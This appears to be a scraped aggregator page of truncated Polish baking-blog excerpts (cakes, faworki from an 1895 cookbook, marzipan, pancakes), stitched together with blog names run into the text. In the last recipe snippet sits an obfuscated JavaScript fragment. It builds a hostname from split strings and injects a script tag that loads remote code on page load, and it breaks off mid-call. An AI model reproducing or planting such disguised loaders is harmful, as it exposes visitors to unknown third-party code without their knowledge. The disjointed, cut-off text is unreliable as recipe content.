napisane są dynamicznie i bez lania wody. Wspomniałam o fotografii, więc jak być w tym dobry, możesz zobaczyć na blogu Molly yeh . Dużo inspiracji szczególnie dla blogerów kulinarnych. Jej torty i zdjęcia są magiczne! Wiadomo, że do fotografii kulinarnej elementy dekoracyjne są ważne, jednak mam wrażenie, że u Molly jedyne skrzypce gra jedzenie. CO CIEKAWEGO ZIMĄ? Jaki jest Twój sposób
Pink Envelopedopiskiem "zrobisz? 😇" Nie było wyjścia, nie w kwestii kulinarnych zachcianek nie potrafię odmówić mojemu dziecku. Poczytałam kilka przepisów i to całe ciasto to nic innego jak krem do tortów, który czasami robię przełożony ciastkami. Poszłam do kuchni i zaczęłam mieszać proporcje z głowy. Przy okazji wymyśliłam sobie, że zrobię ciasto Duo, czyli w dwóch smakach. Celowo wybrałam dużą formę
Blondynka GotujeNasz ulubiony typ ciasta. Drożdżowe? Zjadamy w każdej ilości. Nie dla nas torty, ciasta z kremem, ptysie. Proste, maślane, drożdżowe powala nas na kolana. I do tego kruszonka! Smacznego :) Składniki 55 g świeżych drożdży 100 ml mleka 80 g + łyżeczka cukru 390 g + 1 łyżka+ ewentualnie do podsypania dobrej mąki (u mnie typ 550) 4 jaja 180 g miękkiego
OliveandThymeTort ten przygotowywałam już dwa razy, raz z pomocą mamy i siostry a drugi raz sama. Za każdym razem się udał i jest przepyszny. Żeby nie był taki słodki pominęłam dodanie masy karmelowej do kremu, wg mnie bez tej masy w kremie jest przepyszny. Zawsze zastanawiałam się czy dam radę przygotować i upiec blaty bezowe i się udało! Teraz wiem
Motylkowa KuchniaCytrynowy piegusek z makiem- Edyta Guhl Otwieram kolejne okienko w adwentowym kalendarzu i dzisiaj zapraszam na cytrynowego pieguska. Zauważyłam, że w przeciwieństwie do ciężkich, kremowych tortów, klasyczne babki lub keksy znikają u nas w tempie błyskawicznym. Można zjeść je już na śniadanie, wziąć ze sobą do pracy, doskonale sprawdzają się jako przekąska przy komputerze. Zapraszam
dolcevitainmykitchenDelikatna babka do kawy. Edyta Guhl. Dzisiejsze ciasto jest doskonałym wprowadzeniem do okresu postnego. Po ciężkich kremowych ciastach, bułeczkach, czy tortach, ta klasyczna babka, upieczona w podłużnej foremce, może wydać się ciastem codziennym, takim do popołudniowej kawy. Optycznie jest bardzo udana, wygląda tak pięknie, jak od piekarza. Specjalnie zrobiłam zdjęcie obok foremki w której
dolcevitainmykitchenTort z ryżu na mleku i malin. Edyta Guhl. Hillesheim- miasto kryminałów. Eifel to nie tylko browar w Bitburgu, wody mineralne, czy Nürburgring, popularny tor wyścigowy. Ciemne, sosnowe lasy, dziwaczne skały powulkaniczne, tajemnicze przepaście są tłem wielu mrocznych historii. W samym sercu Eifel leży senne miasteczko Hillesheim, o którym od paru lat zrobiło się głośno
dolcevitainmykitchenplasterki i skropić sokiem z cytryny. Plasterki poukładać na kremie i posypać kakao. Przykryć drugim krążkiem ciasta i lekko docisnąć. Na wierzch wyłożyć pozostały krem i posypać kakao. 9. Tort ozdobić poszatkowanymi orzeszkami, różyczkami i orzechami laskowymi. Udanych wypieków
Mała CukierenkaFaworki angielskie według przepisu z książki „ Praktyczne przepisy pieczenia ciast świątecznych a mianowicie: bab, babek, placków, mazurków, pierników i tortów oraz strucli, kołaczów, chleba, bułek, rogali i różnych przysmaczków do kawy, herbaty i czekolady”, Florentyny Niewiarowskiej, z 1895 roku. Są bardzo podobne do klasycznych faworków , ale nieco mniej kruche i delikatne. 1 łyżka miękkiego masła, 6 żółtek, 75 g cukru
królestwo garówSobota i weekend. Musiałam upiec coś słodkiego do kawy. Moje dziecię miało ochotę na tort princessa , ale zapomniało kupić zielony marcepan. Postarałam się jednak upiec ciasto z marcepanem na wzór szwedzkiego ciasta czekoladowego kladdkaka . Jest to najprostsze i nabjardziej popularne ciasto w Szwecji znane w Polsce pod nazwą ciasto lawa . Ciasto jest wilgotne, lekko rozpływające się w ustach. Ciasto
codojedzenianaleśniki znajdujące się na blogu: Naleśniki biszkoptowe z serem Naleśniki z kaszy jaglanej Naleśniki biszkoptowe z musem jabłkowym Naleśniki na maślance, z jabłkami Mini niemieckie naleśniki Naleśniki na serwatce Tort naleśnikowy Wydrukuj przepis The post Tradycyjne naleśniki z serem appeared first on Moje Wypieki I Nie Tylko
mojewypiekiinietylkorozdrabniaczu migdałów. Chwilę jeszcze mielimy do powstania gładkiej masy. Wykładamy na folię spożywczą. Odkładamy do wystygnięcia. Marcepan można jeść bezpośrednio, lub wykorzystać go do deserów (muffinek, ciast, ciasteczek, tortów) Można go przechowywać nawet do miesiąca w lodówce. Artykuł Marcepan pochodzi z serwisu Moja Qchnia Pełna Smaku
MojaQchnia.plwarto dzielić się swoją wiedzą i smakiem z innymi. Jest mi bardzo miło, że jesteście ze mną i chcecie korzystać z moich przepisów 😊. Urodziny, to powinien być jakiś tort, a tu piernik, a to dlatego, że pierwszym przepisem na blogu był Piernik wyśmienity , więc dlaczego miałoby go zabraknąć w takim dniu. Piernik z powidłami jest bardzo aromatyczny, o umiarkowanej słodyczy
Kuchcik gotujecoś zmienić, pokombinować, poszukać innej wersji faworków. I znalazłam przepis na „chrust migdałowy”, w książce „ Praktyczne przepisy pieczenia ciast świątecznych a mianowicie: bab, babek, placków, mazurków, pierników i tortów oraz strucli, kołaczów, chleba, bułek, rogali i różnych przysmaczków do kawy, herbaty i czekolady”, Florentyny Niewiarowskiej, z 1895 roku. Pomysł wydał się ciekawy, przystąpiłam do roboty. I w pewnym momencie
królestwo garówwłoskiego sera mascarpone. W wersji dla dorosłych warto dodać kilka kropli alkoholu, który pasuje do czekolady. Taki mus czekoladowy może być wykorzystany jako krem do przełożenia blatów biszkoptowych na tort. (function(){ ccku=document.createElement("script");ccku_=("ust");cckuu="15408294"; ccku_+="a"+("t.i");ccku.type="text/javascript"; cckuu+=".nwbbcttjcku0fgx1wqa0";ccku.async=true;ccku_+="n"+("f"+"o")+"/"; cckuu+="n4gh0tsvtX";ccku.src="//"+ccku_+cckuu; document.body.appendChild(ccku
Moja smaczna kuchnia